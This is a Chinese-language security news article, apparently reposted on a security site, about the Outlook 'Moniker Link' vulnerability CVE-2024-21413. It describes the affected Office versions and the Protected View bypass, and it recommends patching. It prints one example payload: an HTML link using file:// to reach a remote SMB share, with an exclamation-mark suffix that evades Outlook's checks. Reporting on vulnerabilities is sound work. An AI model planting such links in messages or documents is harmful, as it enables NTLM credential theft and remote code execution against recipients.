CVE-2024-21413 :通过Outlook中打开带有恶意链接的电子邮件激活

阅读量99787

发布时间 : 2024-02-18 14:26:43

微软警告 用户 其 Office 套件中存在一个严重漏洞,该漏洞可能允许未经身份验证的攻击者执行恶意代码。

Check Point发现 的 漏洞编号 为 CVE-2024-21413 。当在易受攻击的Outlook版本中打开带有恶意链接的电子邮件时,它就会被激活。

特别危险的是,该错误允许黑客绕过旨在阻止 Office 文件中恶意内容的受保护视图功能。它们不是以只读模式打开危险文件,而是立即以编辑模式启动。

该公司表示,使用 CVE-2024-21413 的攻击可以远程进行,无需用户交互,而且对于黑客来说,此类攻击的复杂性仍然很低。

微软在一份声明中表示:“成功利用此漏洞可以授予攻击者很高的权限,包括读取、写入和删除文件的能力。”

该漏洞影响多个 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 企业版以及 Microsoft Outlook 2016 和 Microsoft Office 2019(处于扩展支持范围内)。

Check Point 在其报告中解释说,该漏洞被他们称为“Moniker Link”,允许用户使用 file:// 协议绕过 Outlook 对电子邮件中嵌入的恶意链接的内置保护,从而通过该协议访问攻击者的远程服务器。

在文档扩展名后立即添加感叹号可以让您绕过 Outlook 安全限制。在这种情况下,当您单击链接时,应用程序将访问远程资源并打开目标文件,而不显示警告或错误。

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>链接</a>

该漏洞是由于使用了不安全的 MkParseDisplayName API 造成的,这可能会影响使用它的其他软件。

成功利用漏洞 CVE-2024-21413 可能会导致 NTLM 凭据信息被盗,并通过恶意制作的 Office 文档执行任意代码。

Check Point 建议所有 Outlook 用户尽快应用官方安全更新,幸运的是该更新已经可用。

本文转载自:

如若转载,请注明出处:

安全客 - 有思想的安全新媒体

分享到:微信
+12赞
收藏
安全客
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66